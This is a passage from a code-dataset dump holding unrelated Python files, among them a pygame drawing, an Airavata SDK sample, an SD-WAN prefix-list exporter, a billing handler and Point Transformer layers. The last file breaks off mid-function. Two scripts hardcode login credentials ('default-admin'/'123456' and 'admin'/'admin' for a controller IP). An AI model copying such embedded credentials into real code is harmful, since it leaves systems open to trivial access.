(0, 153, 0), (int(x + w/3), int(y + 2*w/3)), int(r), 0)\n circle(screen, (0, 0, 0), (int(x + w/3), int(y + 2*w/3)), int(r), 2)\n circle(screen, (0, 153, 0), (int(x + w), int(y + 2*w/3)), int(r), 0)\n circle(screen, (0, 0, 0), (int(x + w), int(y + 2*w/3)), int(r), 2)\n circle(screen, (0, 153, 0), (int(x + 3*w/4), int(y + 2*w/3)), int(r), 0)\n circle(screen, (0, 0, 0), (int(x + 3*w/4), int(y + 2*w/3)), int(r), 2)\n circle(screen, (0, 153, 0), (int(x + w/2), int(y + w/3)), int(r), 0)\n circle(screen, (0, 0, 0), (int(x + w/2), int(y + w/3)), int(r), 2)\n circle(screen, (0, 153, 0), (int(x + 5*w/6), int(y + w/3)), int(r), 0)\n circle(screen, (0, 0, 0), (int(x + 5*w/6), int(y + w/3)), int(r), 2)\n \ndef sun(x, y, size):\n R = 100 * size\n r = R - 10\n w = 100 * size\n a = 0\n b = 0\n n = 20\n pl = []\n while a < 6.28:\n xx = x + R*cos(a)\n yy = y + R*sin(a)\n a += 3.14/n\n xxx = x + r*cos(a)\n yyy = y + r*sin(a)\n pl.append((int(xx), int(yy)))\n pl.append((int(xxx), int(yyy)))\n polygon(screen, (254, 254, 34), pl, 0)\n polygon(screen, (0, 0, 0), pl, 1)\n \n \n\nrect(screen, (30, 144, 255), (0, 0, 1200, 400), 0)\nrect(screen, (0, 255, 0), (0, 400, 1200, 350), 0)\nhouse(200, 150, 2)\nhouse(600, 200, 1.5)\ncloud(600, 100, 1.5)\ncloud(300, 100, 1)\ncloud(1000, 150, 1)\ntree(800, 350, 1.5)\ntree(450, 400, 1)\nsun(100, 100, 0.7)\n\n\npygame.display.update()\nclock = pygame.time.Clock()\nfinished = False\n\nwhile not finished:\n clock.tick(FPS)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n finished = True\n\npygame.quit()\n","sub_path":"lab3.1/pic2.py","file_name":"pic2.py","file_ext":"py","file_size_in_byte":3195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"231731441","text":"# Licensed to the Apache Software Foundation (ASF) under one or more\n# contributor license agreements. See the NOTICE file distributed with\n# this work for additional information regarding copyright ownership.\n# The ASF licenses this file to You under the Apache License, Version 2.0\n# (the \"License\"); you may not use this file except in compliance with\n# the License. 
You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\nimport logging\nfrom airavata_sdk.clients.user_profile_client import UserProfileClient\n\nfrom airavata_sdk.clients.keycloak_token_fetcher import Authenticator\n\nfrom airavata.api.error.ttypes import TException\n\nfrom airavata.model.user.ttypes import UserProfile, Status\n\nlogger = logging.getLogger(__name__)\n\nlogger.setLevel(logging.DEBUG)\n\nauthenticator = Authenticator();\ntoken = authenticator.get_token_and_user_info_password_flow(\"default-admin\", \"123456\", \"default\")\n\n# load GroupManagerClient with default configuration\nclient = UserProfileClient()\n\n\n# load client with given configuration file (e.g customized_settings.ini)\n# client = UserProfileClient('../transport/settings.ini')\n\n\ndef add_user_profile():\n try:\n profile = UserProfile()\n profile.gatewayId = \"default\"\n profile.userId = \"default-admin\"\n profile.emails = ['gw@scigap.org']\n profile.airavataInternalUserId = \"default-admin\"\n profile.userModelVersion = \"1.0.0\"\n profile.firstName = \"Isuru\"\n profile.lastName = \"Ranawaka\"\n profile.creationTime = 1576103354\n profile.lastAccessTime = 1576103296\n profile.validUntil = 1607725696\n profile.State = Status.ACTIVE\n added_profile = client.add_user_profile(token, profile)\n print(\"Add user proflile\", added_profile)\n except TException:\n logger.exception(\"Error Occurred\")\n\n\ndef get_all_user_profiles_in_gateway():\n try:\n profiles = client.get_all_user_profiles_in_gateway(token, \"default\", 0, -1)\n print(\"User Profiles \", profiles)\n except TException:\n logger.exception(\"Error Occurred\")\n","sub_path":"airavata-api/airavata-client-sdks/airavata-python-sdk/airavata_sdk/samples/user_profile_client_samples.py","file_name":"user_profile_client_samples.py","file_ext":"py","file_size_in_byte":2432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"311845538","text":"# -*- coding: utf-8 -*-\n\n\n\nimport os\nimport sys\nimport glob\nimport pandas as pd\n#import numpy\n\n\n'''\nFilenames are given via command line. You should run the script from the \ndirectory that contains the CSV/txt files. The first argument after the script \nthrough the final argument are the filenames.\n'''\n\ndir = os.getcwd()\nprint(\"wd:\", dir)\n\nif len(sys.argv) > 1:\n fil = sys.argv[1:]\n exps = (len(sys.argv) - 1)\n print(\"Files manually specified.\", exps, \"experiments found.\")\nelse:\n fil = glob.glob('*.csv')\n exps = len(fil)\n print(\"Reading all CSV files in directory.\", exps,\"experiments found.\")\nprint(fil)\n\n'''\nRead from external CSV that contains slopes (a), intercepts(b), and fits(c).\nCurrently, the curve file is not created via any script. 
I made my curves CSV \nfrom previous curve data.\n'''\nos.chdir(\"..\")\nprint(os.getcwd())\ncrvs = pd.read_csv(\"curves.csv\")\n#print(crvs)\n\nos.chdir(dir)\nprint(os.getcwd())\n\nexp_list = {}\nfor f in fil:\n fdf = pd.read_csv(f)\n exp_list[f] = pd.DataFrame(fdf)\n \nprint(len(exp_list))\nfor key in exp_list.keys():\n #print(\"\\n\" +\"=\"*40)\n print(key)\n #print(exp_list[key])\n\n\n\n\"\"\"\nfor f in fil:\n fdfs = {}\n fdfs.append(pd.read_csv(f))\n print(\"fdfs length:\", len(fdfs))\n for df in fdfs:\n gene = fdfs['Target Name']\n fdfs.drop(labels=['Target Name'], axis=1,inplace = True)\n fdfs.insert(0, 'Target Name', gene)\n sample = fdfs['Sample Name']\n fdfs.drop(labels=['Sample Name'], axis=1,inplace = True)\n fdfs.insert(1, 'Sample Name', sample)\n fdfs.groupby(['Sample Name', 'Target Name'])\n files.append(fdfs)\n print(len(files))\n print(fdfs)\n \"\"\"\n\n\n\n\n\n","sub_path":"analyze.py","file_name":"analyze.py","file_ext":"py","file_size_in_byte":1693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"205393852","text":"#! /usr/bin/env python3\n\n\"\"\"This represents a legacy-sdwan migration use case. This script takes a cisco IOS config file as an input,\nparses all prefix-lists configured and sets it to the json formated data structure which is send to the\nSD-WAN controller as an API call.\n\nAs a final result we see all the prefix-list transfered from raw text IOS config to the controller config object\nvia API\"\"\"\n\n\nfrom restapicalls import RestApiCalls\nimport json\nimport os\nimport sys\n\n\ndef prefix_payload_gen(file):\n pl_line = []\n dict_items_list = []\n i = 0\n k = 0\n\n with open(file, 'r') as f:\n data = f.read()\n\n for line in data.splitlines():\n if line.startswith('ip prefix-list'):\n pl_line.append(line)\n line_items = line.split(' ')\n name = line_items[line_items.index('prefix-list') + 1]\n dict_items = ({'name': name, 'entries': []})\n if dict_items not in dict_items_list:\n dict_items_list.append(dict_items)\n\n if not pl_line:\n print('No prefix-lists were found in the \"{}\" config-file'.format(file))\n else:\n for line in pl_line:\n line_items = line.split(' ')\n name = line_items[line_items.index('prefix-list') + 1]\n ipprefix = line_items[line_items.index('seq') + 3]\n\n if name != dict_items_list[i]['name']:\n i += 1\n k = 0\n\n dict_items_list[i]['entries'].insert(k, {'ipPrefix': ipprefix})\n if 'ge' in line_items:\n dict_items_list[i]['entries'][k].update({'ge': line_items[line_items.index('ge') + 1]})\n if 'le' in line_items:\n dict_items_list[i]['entries'][k].update({'le': line_items[line_items.index('le') + 1]})\n k += 1\n\n with open('api_call_data', 'w') as f:\n f.write(json.dumps(dict_items_list, indent=4))\n\n return dict_items_list\n\n\ndef _main():\n sdwan = RestApiCalls('10.177.28.62', 'admin', 'admin')\n for pl in prefix_payload_gen(sys.argv[1]):\n sdwan.post_request('template/policy/list/prefix', pl)\n print('Prefix-list {} parsed and exported to SD-WAN Controller'.format(pl['name']))\n\n\nif __name__ == \"__main__\":\n _main()\n","sub_path":"Scripts/prefix-list_export.py","file_name":"prefix-list_export.py","file_ext":"py","file_size_in_byte":2226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"346898166","text":"# -*- coding: utf-8 -*-\nfrom pymongo import Connection\n\nfrom social_billing.engine.errors import ItemFormatError, UnknownItemError,\\\n InvalidCountError, CallbackError, SignatureError\nfrom 
social_billing.engine.handler.info import Info\nfrom social_billing.engine.handler.order import Order\nfrom social_billing.engine.handler.billing import BillingHandler\nfrom social_billing.engine.signature import Signature\n\n\nORDER = 'order_status_change'\nGET_ITEM = 'get_item'\n\n\nclass Payment(BillingHandler):\n\n def __init__(self, name, prices, secret, callback):\n self.db = Connection()['payment_%s' % name]\n self.collection = self.db['order']\n\n self.signature = Signature(secret)\n self.info = Info(prices)\n self.order = Order(self.collection, callback)\n\n def request(self, args):\n notification_type = args.get('notification_type')\n\n try:\n if not self.signature.check(args, args.pop('sig')):\n raise SignatureError()\n if notification_type.startswith(GET_ITEM):\n return self.info(args['item'])\n if notification_type.startswith(ORDER):\n return self.order(args['order_id'], args['receiver_id'],\n args['item'], args['status'])\n except (ItemFormatError, UnknownItemError, InvalidCountError,\n CallbackError, SignatureError) as error:\n return error.response()\n","sub_path":"social_billing/engine/payment.py","file_name":"payment.py","file_ext":"py","file_size_in_byte":1440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"49137674","text":"\nimport bs\nimport bsInternal\nimport bsPowerup\nimport bsUtils\nimport random\n\nclass chatlogger(object):\n\n\tdef chatwritter(self,gname,msg):\n\n\n\t\twith open(bs.getEnvironment()['systemScriptsDirectory'] + \"/ChatsLogged.txt\",mode='a') as f:\n\t\t\tf.write(' || '+gname+' || '+msg+' \\n')\n\t\t\tf.close()\n\t\t\t\n\t \n\tdef checkId(self,nick): # check host (settings.cmdForMe)\n\t client_str = []\n\t for client in bsInternal._getGameRoster():\n\t if client['players'] != []:\n\t if client['players'][0]['name'] == nick.encode('utf-8'):\n\t client_str = client['displayString']\n\t #clientID = client['clientID']\n\t return client_str \n\n\t\n\n\nd=chatlogger()\ndef chatLogg(msg):\n if bsInternal._getForegroundHostActivity() is not None:\n\t\n n = msg.split(': ')\n d.chatwritter(n[0],n[1]) ","sub_path":"server files 1.4.148/data/scripts/chatLog.py","file_name":"chatLog.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"82819132","text":"__author__ = 'tusharsappal'\n\n\nfrom urllib import urlopen\nfrom xml.etree.ElementTree import parse\n\n## This script fetches the xml data from the given link and displays the data\n\n## Courtesy Python Cook Book 6.3\n\n\n\n\ndef parse_xml_data():\n u =urlopen('http://planet.python.org/rss20.xml')\n\n ## Replace the url with the actual url to be fetched\n\n doc=parse(u)\n\n for item in doc.iterfind('channel/item'):\n title = item.findtext('title')\n date = item.findtext('pubDate')\n link = item.findtext('link')\n\n\n print(title)\n print(date)\n print(link)\n\n\n\n\nparse_xml_data()\n\n","sub_path":"python_scripts/python_cook_book_receipes/encoding_processing_files/parsing_xml_data.py","file_name":"parsing_xml_data.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"207964203","text":"\n\ndef prime_test(list_of_numbers):\n list_of_primes = []\n list_of_composites = []\n \n for number in list_of_numbers:\n list_of_possible_factors = list(range(2, int((number**0.5)+1)))\n factors = []\n for each_number in list_of_possible_factors:\n if number % each_number == 0:\n 
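# (editorial aside, sketch only: an equivalent early-exit test is\n                #  any(number % d == 0 for d in list_of_possible_factors),\n                #  which stops at the first divisor instead of collecting them all)\n                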
factors.append(each_number)\n if len(factors) == 0:\n list_of_primes.append(number)\n else:\n list_of_composites.append(number)\n\n print(f'Primes between 2 and {limit}: {list_of_primes}')\n # print(f'Composites between 2 and {limit}: {list_of_composites}')\n\n\nlimit = 10\nprime_test(list(range(2, limit)))\n\n\n","sub_path":"prime_generator.py","file_name":"prime_generator.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"417963940","text":"import itertools\nimport operator\nimport time\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nimport numpy as np\nimport numpy.ma as ma\n\n#from pointnet2_utils import furthest_point_sample as farthest_point_sample_cuda\nfrom pointnet2_utils import gather_operation as index_points_cuda_transpose\nfrom pointnet2_utils import grouping_operation as grouping_operation_cuda\nfrom pointnet2_utils import ball_query as query_ball_point_cuda\nfrom pointnet2_utils import QueryAndGroup\n\n\n#from knn_cuda import KNN\nimport MinkowskiEngine as ME\n\ndef square_distance(src, dst):\n \"\"\"\n Calculate Euclid distance between each two points.\n src^T * dst = xn * xm + yn * ym + zn * zm;\n sum(src^2, dim=-1) = xn*xn + yn*yn + zn*zn;\n sum(dst^2, dim=-1) = xm*xm + ym*ym + zm*zm;\n dist = (xn - xm)^2 + (yn - ym)^2 + (zn - zm)^2\n = sum(src**2,dim=-1)+sum(dst**2,dim=-1)-2*src^T*dst\n Input:\n src: source points, [B, N, C]\n dst: target points, [B, M, C]\n Output:\n dist: per-point square distance, [B, N, M]\n \"\"\"\n return torch.sum((src[:, :, None] - dst[:, None]) ** 2, dim=-1)\n\n\ndef index_points_cuda(points, idx):\n \"\"\"\n\n Input:\n points: input points data, [B, N, C]\n idx: sample index data, [B, S]\n Return:\n new_points:, indexed points data, [B, S, C]\n \"\"\"\n points = points.transpose(1,2).contiguous() #[B, C, N]\n new_points = index_points_cuda_transpose(points, idx) #[B, C, S]\n \n return new_points.transpose(1,2).contiguous()\n\n\ndef stem_knn(xyz, points, k):\n knn = KNN(k=k, transpose_mode=True)\n xyz = xyz.permute([0,2,1])\n _, idx = knn(xyz.contiguous(), xyz) # xyz: [bs, npoints, coord] idx: [bs, npoint, k]\n idx = idx.int()\n \n # take in [B, 3, N]\n grouped_xyz = grouping_operation_cuda(xyz.transpose(1,2).contiguous(), idx) # [bs, xyz, n_point, k]\n grouped_points = grouping_operation_cuda(points.contiguous(), idx) #B, C, npoint, k)\n\n return grouped_xyz, grouped_points\n\n\ndef sample_and_group_cuda(npoint, k, xyz, points):\n \"\"\"\n Input:\n npoint:\n k:\n xyz: input points position data, [B, N, 3]\n points: input points data, [B, C, N]\n Return:\n new_xyz: sampled points position data, [B, 3, npoint]\n new_points: sampled points data, [B, C+C_xyz, npoint, k]\n grouped_xyz_norm: sampled relative points position data, [B, 3, npoint, k]\n \"\"\"\n k = min(npoint, k)\n knn = KNN(k=k, transpose_mode=True)\n\n B, N, C_xyz = xyz.shape\n\n if npoint < N:\n fps_idx = farthest_point_sample_cuda(xyz, npoint) # [B, npoint]\n torch.cuda.empty_cache()\n new_xyz = index_points_cuda(xyz, fps_idx) #[B, npoint, 3]\n else:\n new_xyz = xyz\n\n \n torch.cuda.empty_cache()\n _, idx = knn(xyz.contiguous(), new_xyz) # B, npoint, k\n idx = idx.int()\n \n torch.cuda.empty_cache()\n grouped_xyz = grouping_operation_cuda(xyz.transpose(1,2).contiguous(), idx).permute(0,2,3,1) # [B, npoint, k, C_xyz]\n #print(grouped_xyz.size())\n torch.cuda.empty_cache()\n grouped_xyz_norm = grouped_xyz - new_xyz.view(B, npoint, 1, C_xyz) # [B, npoint, k, 
3]\n grouped_xyz_norm = grouped_xyz_norm.permute(0,3,1,2).contiguous()# [B, 3, npoint, k]\n torch.cuda.empty_cache()\n\n grouped_points = grouping_operation_cuda(points.contiguous(), idx) #B, C, npoint, k\n\n new_points = torch.cat([grouped_xyz_norm, grouped_points], dim=1) # [B, C+C_xyz, npoint, k]\n \n\n return new_xyz.transpose(1,2), grouped_xyz_norm, new_points\n\nclass TDLayer(nn.Module):\n def __init__(self, input_dim, out_dim, k=16):\n super().__init__()\n '''\n Transition Down Layer\n npoint: number of input points\n nsample: k in kNN, default 16\n in_dim: feature dimension of the input feature x (output of the PCTLayer)\n out_dim: feature dimension of the TDLayer\n\n '''\n self.k = k\n self.input_dim = input_dim\n self.out_dim = out_dim\n\n self.mlp_convs = nn.ModuleList()\n self.mlp_bns = nn.ModuleList()\n\n self.mlp_convs.append(nn.Conv2d(input_dim+3, input_dim, 1))\n self.mlp_convs.append(nn.Conv2d(input_dim, out_dim, 1))\n self.mlp_bns.append(nn.BatchNorm2d(input_dim))\n self.mlp_bns.append(nn.BatchNorm2d(out_dim))\n\n self.conv = ME.MinkowskiConvolution(\n input_dim,\n out_dim,\n kernel_size=3,\n stride=2,\n bias=False,\n dimension=3\n )\n\n def forward(self, x : ME.SparseTensor):\n \"\"\"\n Input:\n xyz: input points position data, [B, 3, N]\n points: input points data, [B, C, N]\n Return:\n new_xyz: sampled points position data, [B, C, S]\n new_points_concat: sample points feature data, [B, D', S]\n \"\"\"\n # B, input_dim, npoint = list(xyz.size())\n #xyz = xyz.permute(0, 2, 1)\n\n # new_xyz, grouped_xyz_norm, new_points = sample_and_group_cuda(self.npoint, self.k, xyz, points)\n # new_xyz: sampled points position data, [B, 3, npoint]\n # new_points: sampled points data, [B, C+C_xyz, npoint,k]\n # grouped_xyz_norm: [B, 3, npoint,k]\n\n # for i, conv in enumerate(self.mlp_convs):\n # bn = self.mlp_bns[i]\n # new_points = F.relu(bn(conv(new_points)))\n\n\n # new_points_pooled = torch.max(new_points, 3)[0] # local max pooling\n x = self.conv(x)\n return x\n\nclass TULayer(nn.Module):\n def __init__(self, input_dim, out_dim, k=3):\n super().__init__()\n '''\n Transition Up Layer\n npoint: number of input points\n nsample: k in kNN, default 3\n in_dim: feature dimension of the input feature x (output of the PCTLayer)\n out_dim: feature dimension of the TDLayer\n\n '''\n self.k = k\n self.input_dim = input_dim\n self.out_dim = out_dim\n\n self.linear_1 = nn.Conv1d(input_dim, out_dim, 1)\n self.linear_2 = nn.Conv1d(out_dim, out_dim, 1)\n\n self.conv = ME.MinkowskiConvolutionTranspose(\n in_channels=input_dim,\n out_channels=out_dim,\n kernel_size=3,\n stride=2,\n dimension=3\n )\n\n def forward(self, x : ME.SparseTensor):\n \"\"\"\n Input:\n M < N\n xyz_1: input points position data, [B, 3, M]\n xyz_2: input points position data, [B, 3, N]\n points_1: input points data, [B, C, M]\n points_2: input points data, [B, C, N]\n\n interpolate xyz_2's coordinates feature with knn neighbor's features weighted by inverse distance\n\n Return:\n new_xyz: sampled points position data, [B, C, S]\n new_points_concat: sample points feature data, [B, D', S]\n \"\"\"\n\n # B, input_dim, M = list(points_1.size())\n # B, output_dim, N = list(points_2.size())\n\n # points_1 = self.linear_1(points_1)\n # points_2 = self.linear_2(points_2)\n\n\n # dists = square_distance(xyz_2.transpose(1,2), xyz_1.transpose(1,2)) # [B, N, M]\n # dists, idx = dists.sort(dim=-1)\n # dists, idx = dists[:,:,:self.k], idx[:,:,:self.k]\n\n # dist_recip = 1.0 / (dists + 1e-8)\n # norm = torch.sum(dist_recip, dim=2, 
keepdim=True)\n # weight = dist_recip / norm\n # interpolated_points = torch.sum( \\\n # grouping_operation_cuda(points_1, idx.int())*weight.view(B, 1, N, 3)\n # ,dim=-1)\n\n\n # return xyz_2 , (interpolated_points + points_2)\n x = self.conv(x)\n return x\n\ndef index_points(points, idx):\n \"\"\"\n Input:\n points: input points data, [B, N, C]\n idx: sample index data, [B, S, [K]]\n Return:\n new_points:, indexed points data, [B, S, [K], C]\n \"\"\"\n raw_size = idx.size()\n idx = idx.reshape(raw_size[0], -1)\n res = torch.gather(points, 1, idx[..., None].expand(-1, -1, points.size(-1)))\n return res.reshape(*raw_size, -1)\n\nclass TransposeLayerNorm(nn.Module):\n\n def __init__(self, dim):\n super(TransposeLayerNorm, self).__init__()\n self.dim = dim\n self.norm = nn.LayerNorm(dim)\n\n def forward(self, x):\n if len(x.shape) == 3:\n # [bs, in_dim, npoints]\n pass\n elif len(x.shape) == 4:\n # [bs, in_dim, npoints, k]\n pass\n else:\n raise NotImplementedError\n\n return self.norm(x.transpose(1,-1)).transpose(1,-1)\n\nclass PTBlock(nn.Module):\n def __init__(self, in_dim, is_firstlayer=False, n_sample=16, r=10):\n super().__init__()\n '''\n Point Transformer Layer\n\n in_dim: feature dimension of the input feature x\n out_dim: feature dimension of the Point Transformer Layer(currently same with hidden-dim)\n [?] - not sure how to set hidden. the paper only gives the out\n '''\n\n self.r = r # neighborhood cube radius\n self.in_dim = in_dim\n self.is_firstlayer = is_firstlayer\n\n # TODO: set the hidden/vector/out_dims\n self.hidden_dim = in_dim\n # self.out_dim = min(4*in_dim, 512)\n self.out_dim = in_dim\n self.vector_dim = self.out_dim\n self.n_sample = n_sample\n\n # whether use BN or LN or None\n # 0 - None\n # 1 - BN\n # 2 - LN\n\n self.use_bn = 1\n # use transformer-like preLN before the attn & ff layer\n self.pre_ln = False\n\n # whether to use the vector att or the original attention\n self.use_vector_attn = True\n self.nhead = 4\n\n self.linear_top = nn.Sequential(\n ME.MinkowskiConvolution(in_dim, self.hidden_dim, kernel_size=1, dimension=3),\n ME.MinkowskiBatchNorm(self.hidden_dim) if self.use_bn else nn.Identity()\n )\n self.linear_down = nn.Sequential(\n ME.MinkowskiConvolution(self.out_dim, self.in_dim, kernel_size=1, dimension=3),\n ME.MinkowskiBatchNorm(self.in_dim) if self.use_bn else nn.Identity()\n )\n # feature transformations\n self.phi = nn.Sequential(\n ME.MinkowskiConvolution(self.hidden_dim, self.out_dim, kernel_size=1, dimension=3)\n )\n self.psi = nn.Sequential(\n ME.MinkowskiConvolution(self.hidden_dim, self.out_dim, kernel_size=1, dimension=3)\n )\n self.alpha = nn.Sequential(\n ME.MinkowskiConvolution(self.hidden_dim, self.out_dim, kernel_size=1, dimension=3)\n )\n\n# self.gamma = nn.Sequential(\n# ME.MinkowskiConvolution(self.out_dim, self.hidden_dim, kernel_size=1, dimension=3),\n# ME.MinkowskiBatchNorm(self.hidden_dim) if self.use_bn else nn.Identity(),\n# ME.MinkowskiReLU(),\n# ME.MinkowskiConvolution(self.hidden_dim, self.vector_dim, kernel_size=1, dimension=3),\n# ME.MinkowskiBatchNorm(self.vector_dim) if self.use_bn else nn.Identity()\n# )\n#\n# self.delta = nn.Sequential(\n# ME.MinkowskiConvolution(3, self.hidden_dim, kernel_size=1, dimension=3),\n# ME.MinkowskiBatchNorm(self.hidden_dim) if self.use_bn else nn.Identity(),\n# ME.MinkowskiReLU(),\n# ME.MinkowskiConvolution(self.hidden_dim, self.out_dim, kernel_size=1, dimension=3),\n# ME.MinkowskiBatchNorm(self.out_dim) if self.use_bn else nn.Identity()\n# )\n self.gamma = nn.Sequential(\n 
nn.Conv1d(self.out_dim, self.hidden_dim, 1),\n nn.BatchNorm1d(self.hidden_dim) if self.use_bn else nn.Identity(),\n nn.ReLU(),\n nn.Conv1d(self.hidden_dim, self.vector_dim, 1),\n nn.BatchNorm1d(self.vector_dim) if self.use_bn else nn.Identity()\n )\n self.delta = nn.Sequential(\n nn.Conv2d(3, self.hidden_dim, 1),\n nn.BatchNorm2d(self.hidden_dim) if self.use_bn else nn.Identity(),\n nn.ReLU(),\n nn.Conv2d(self.hidden_dim, self.out_dim, 1),\n nn.BatchNorm2d(self.out_dim) if self.use_bn else nn.Identity()\n )\n\n if self.pre_ln:\n self.ln_top = nn.LayerNorm(self.in_dim)\n self.ln_attn = nn.LayerNorm(self.hidden_dim)\n self.ln_down = nn.LayerNorm(self.out_dim)\n # @Niansong: Minkowski doesn't seem to have layer norm, I'm using InstanceNorm instead\n # self.in_top = ME.MinkowskiInstanceNorm(self.in_dim)\n # self.in_attn = ME.MinkowskiInstanceNorm(self.hidden_dim)\n # self.in_down = ME.MinkowskiInstanceNorm(self.out_dim)\n\n # TODO: what r should we use? I'm using 10 as default for now, perhaps too large for ModelNet40\n self.cube_query = cube_query(r=self.r, k=n_sample)\n\n\n def forward(self, x : ME.SparseTensor):\n '''\n input_p: B, 3, npoint\n input_x: B, in_dim, npoint\n '''\n\n PT_begin = time.perf_counter()\n self.B = (x.C[:,0]).max().item() + 1 # batch size\n\n npoint, in_dim = tuple(x.F.size())\n k = min(self.n_sample, npoint)\n self.k = k\n h = self.nhead\n res = x\n\n # however the knn still gives 16 idxs\n # DEBUG: when using the r = 5, sometimes there is error\n if npoint <= self.n_sample:\n self.cube_query = cube_query(r=self.r, k=k)\n\n neighbor, mask = self.cube_query.get_neighbor(x, x)\n # neighbor: [B*npoint, k, bxyz]\n # mask: [B*npoint, k]\n \n if self.pre_ln:\n x = self.ln_top(x)\n\n x = self.linear_top(x) # [B, in_dim, npoint], such as [16, 32, 4096]\n\n if self.pre_ln:\n x = self.in_attn(x)\n\n # illustration on dimension notations:\n # - B: batch size\n # - nvoxel: number of all voxels of the whole batch\n # - k: k neighbors\n # - feat_dim: feature dimension, or channel as others call it\n # - nvoxel_batch: the maximum voxel number of a single SparseTensor in the current batch\n\n phi = self.phi(x).F # (nvoxel, feat_dim)\n phi = phi[:,None,:].repeat(1,k,1) # (nvoxel, k, feat_dim)\n\n psi = get_neighbor_feature(neighbor, self.psi(x)) # (nvoxel, k, feat_dim)\n # @Niansong: psi is the feature of each voxel's k neighbors\n alpha = get_neighbor_feature(neighbor, self.alpha(x)) # (nvoxel, k, feat_dim)\n \n\n\n try:\n relative_xyz = neighbor - x.C[:,None,:].repeat(1,k,1) # (nvoxel, k, bxyz), we later pad it to [B, xyz, nvoxel_batch, k]\n except RuntimeError:\n import ipdb; ipdb.set_trace()\n\n WITH_POSE_ENCODING = True\n if WITH_POSE_ENCODING:\n\n relative_xyz[:,0,0] = x.C[:,0] # get back the correct batch index, because we messed batch index in the subtraction above\n # since each batch could have different number of voxels, we need to pad them\n relative_xyz = pad_zero(relative_xyz, mask) # [B, xyz, nvoxel_batch, k]\n # @Niansong: a further illustration on batch_mask:\n # type: dict, content: {batch_idx : num of voxel}\n pose_encoding = self.delta(relative_xyz.float()) # (B, feat_dim, nvoxel_batch, k)\n # now we squeeze pose_encoding to (nvoxel, hidden_size, k), this should correspond to k SparseTensors\n # it is the positional encoding for each of the k neighbors\n\n time_begin = time.perf_counter()\n pose_tensor = make_position_tensor(pose_encoding, mask, x.C.shape[0]) # (nvoxel, k, feat_dim)\n\n time_end = time.perf_counter()\n # print('Overall took {}ms'.format((time_end 
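# For reference, the vector-attention update assembled below can be written compactly.
# This is an illustrative dense sketch (hypothetical gamma module and shapes), not the
# sparse Minkowski path used by PTBlock itself:
import torch
import torch.nn.functional as F

def vector_attention(phi, psi, alpha, delta, gamma):
    # phi/psi/alpha: (nvoxel, k, feat_dim) projections; delta: positional encoding, same shape
    # gamma: any module mapping (nvoxel, feat_dim, k) -> (nvoxel, feat_dim, k)
    attn = F.softmax(gamma((phi - psi + delta).permute(0, 2, 1)), dim=-1)
    value = (alpha + delta).permute(0, 2, 1)   # (nvoxel, feat_dim, k)
    return (attn * value).sum(dim=-1)          # (nvoxel, feat_dim)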
- time_begin)*1e3))\n\n        if self.use_vector_attn:\n            # the attn_map: [vector_dim];\n            # the alpha: [out_dim]\n            # attn_map = F.softmax(self.gamma(phi - psi + pos_encoding), dim=-1) # [B, in_dim, npoint, k], such as [16, 32, 4096, 16]\n            # y = attn_map.repeat(1, self.out_dim // self.vector_dim,1,1)*(alpha + pos_encoding) # multiplies attention weight\n            # self.out_dim and self.vector_dim are all 32 here, so y is still [16, 32, 4096, 16]\n            # y = y.sum(dim=-1) # feature aggregation, y becomes [B, out_dim, npoint]\n\n            if WITH_POSE_ENCODING:\n                gamma_input = phi - psi + pose_tensor # (nvoxel, k, feat_dim)\n            else:\n                gamma_input = phi - psi  # (nvoxel, k, feat_dim)\n            gamma_input = gamma_input.permute(0, 2, 1) # (nvoxel, feat_dim, k)\n            attn_map = F.softmax(self.gamma(gamma_input), dim=-1) # (nvoxel, feat_dim, k)\n            if WITH_POSE_ENCODING:\n                self_feat = (alpha + pose_tensor).permute(0,2,1) # (nvoxel, k, feat_dim) -> (nvoxel, feat_dim, k)\n            else:\n                self_feat = (alpha).permute(0,2,1) # (nvoxel, k, feat_dim) -> (nvoxel, feat_dim, k)\n            y = attn_map.repeat(1, self.out_dim // self.vector_dim, 1, 1) * self_feat # (nvoxel, feat_dim, k)\n            y = y.sum(dim=-1).view(x.C.shape[0], -1)  # feature aggregation, y becomes (nvoxel, feat_dim)\n            y = ME.SparseTensor(features = y, coordinate_map_key=x.coordinate_map_key, coordinate_manager=x.coordinate_manager)\n        else:\n            #phi = phi.reshape(B, h, self.out_dim//h, npoint, k)\n            #psi = psi.reshape(B, h, self.out_dim//h, npoint, k)\n            #attn_map = F.softmax((phi*psi).reshape(B, self.out_dim, npoint, k) + pos_encoding, dim=-1)\n            #y = attn_map*(alpha+pos_encoding)\n            #y = y.sum(dim=-1)\n            pass\n\n        \n        if self.pre_ln:\n            y = self.ln_down(y.transpose(1,2)).transpose(1,2)\n\n        y = self.linear_down(y)\n\n        PT_end = time.perf_counter()\n        # print('PT blocks: {}ms'.format((PT_end - PT_begin)*1e3))\n\n        return y+res, attn_map.detach().cpu().data\n\n\ndef make_position_tensor(pose_encoding : torch.Tensor, mask : torch.Tensor, nvoxel : int):\n    \"\"\"\n    Mask positional encoding into k ME.SparseTensors\n\n    Input:\n        pose_encoding: (B, feat_dim, nvoxel_batch, k)\n        batch_tensor: (B, N)\n    \"\"\"\n    # import ipdb; ipdb.set_trace()\n\n\n\n    B, feat_dim, nvoxel_batch, k  = pose_encoding.shape\n    pose_encoding = pose_encoding.permute(0, 2, 3, 